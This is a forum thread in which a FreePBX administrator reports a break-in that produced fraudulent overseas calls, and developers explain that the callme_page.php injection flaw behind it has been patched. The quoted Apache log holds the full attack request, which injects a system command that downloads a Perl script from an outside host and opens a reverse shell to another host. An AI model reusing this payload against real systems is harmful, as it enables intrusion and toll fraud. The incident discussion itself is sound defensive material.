Yesterday, after only a few hours that my company installed a new FreePBX system, the customer PBX was attacked and the system compromised. In the night were made hundreds of phone calls to Africa and Central America.
The system is Ubuntu 10.04 LTS with FreePBX 2.8/Asterisk 184.108.40.206 with all packages updated. And the passwords are 12 characters lenght with variable complexity.
Analizing the apache log i see this connection from Russia:
220.127.116.11 - - [27/Mar/2012:03:52:06 +0200] “GET /recordings/misc/callme_page.php?action=c&callmenum=*[email protected]/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://analoghost.jp/mt/.stuff/back.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%20inspiran.be%201234%0D%0A%0D%0Ace HTTP/1.1” 200 1087 “-” “Mozilla/5.0 (X11; Ubun
tu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0”
Google tell me this exploit:
Can someone tell me if this a new vulnerability?
What can i do to avoid this in future?
This exploit should be fixed if all modules are up-to-date on versions 2.6 and above.
Btw … 2.8 is out of support, but the vulnerability was still fixed on it.
You say that this vulnerability was solved in 2.6 but this page (http://packetstormsecurity.org/files/111174/freepbx_callmenum.rb.txt)
published yesterday say clearly: “This Metasploit module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the ‘callmenum’ parameter, it is possible to inject code to the ‘$channel’ variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs”
Do you have all your modules updated. We just published all these fixes last Friday from 2.6 and up.
the report is not up-to-date with the fact that it has been fixed.
It requires the vulnerability to be passed in as a parameter. That parameter is no longer used. The only parameter that is now passed in is the action whether to initiate a call or hangup an existing call. The extension in question is obtained from the SESSION and the actual number to call is pulled directly from the AstDB which is setup for the user.
as a side comment, the same concept could be exploited by an authenticated user if they input a bogus callme number into the GUI, or is otherwise someone managed to inject that into the AstDB variable.
The above has not been done or reported anywhere but was the second phase of addressing the potential exploit that we started going over right after immediately closing down the known and more dangerous issue.
It has been fixed per #5729 though so it is now both properly validated and properly checked to be a valid number when being used regardless of how it got into the AstDB.